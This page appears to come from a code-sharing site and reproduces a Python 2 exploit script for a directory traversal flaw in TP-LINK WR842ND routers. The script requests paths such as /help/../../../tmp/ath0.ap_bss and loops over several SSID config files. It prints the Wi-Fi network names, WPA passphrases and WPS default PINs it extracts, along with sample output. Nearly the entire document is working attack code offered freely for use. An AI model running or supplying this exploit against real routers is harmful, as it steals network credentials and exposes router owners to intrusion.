扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 |
#!/usr/bin/python ''' TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit Adam Simuntis :: http://unixjail.com If remote management is on you have full access to router configuration - if not and you're connected to router network you can discover another configured SSID's. Successfully tested against TP-LINK WR842ND Firmware Version: 3.12.22 Build 120424 Rel.39632n Feel free to use, modify and distribute. .-(~)---------------------------------------------------------------------------------(adam@ninja)- --> python2 e.py ip:port TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit Adam Simuntis :: http://unixjail.com :: Crafting and sending evil request.. -> ssid="some_network" !wps_default_pin=01010101 !wpa_passphrase="secretpsk" :: Search for another networks? (y/n) > y :: Searching.. :: Jumping for SSID 1.. -> ssid="another_network" !wps_default_pin=01010101 !wpa_passphrase="another_secretpsk" :: Jumping for SSID 2.. :: Jumping for SSID 3.. :: Jumping for SSID 4.. .-(~)---------------------------------------------------------------------------------(adam@ninja)- </code>--> ''' import requests,sys,socket from time import sleep data='' data2='' url='' W= '\033[0m' R= '\033[31m' B= '\033[34m' #KISS def parse_data(text): words = text.split() for word in words : if 'ssid' in word and 'ignore' not in word : print W+"-> "+B+"%s" %(word) if 'pass' in word : print W+" !"+R+"%s" %(word) if 'default_pin' in word : print W+" !"+R+"%s" %(word) print W def make_url(host,n): junk = ("http://%s/help/../../../../../../../../../../../../../../../../tmp/ath%s.ap_bss") % (host,n) return junk if len(sys.argv) == 1 : print "Usage: %s router_ip:port (default port=80)" %(sys.argv[0]) sys.exit() url = make_url(sys.argv[1],0) if ':' in sys.argv[1] : host = sys.argv[1].split(":") else : host = sys.argv[1] headers={ "Host" : host[0], "User-Agent" : "Mozzila/5.0", "Referer" : "http://"+host[0]+"/" } print "TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit" print "Adam Simuntis :: http://unixjail.com\n" try: print R+":: Crafting and sending evil request.." print W data = requests.get(url,headers=headers).content except requests.ConnectionError, e: print R+":! Connection error!\n" sys.exit() if data : parse_data(data) else : print B+":! Ups.. seems to be not vulnerable" print W print "\n:: Search for another networks? (y/n)" answer = raw_input("> ") if answer=="y" or answer=="Y" : print R+"\n:: Searching.." print W for i in range(1,5) : print W+":: Jumping for SSID %s..\n" %(i) sleep(3) url = make_url(sys.argv[1],i) data2 = requests.get(url,headers=headers).content if data2 : parse_data(data2) else : print B+"-> Nothing..\n" else : print W+"\n:: Bye!" print |
体验盒子
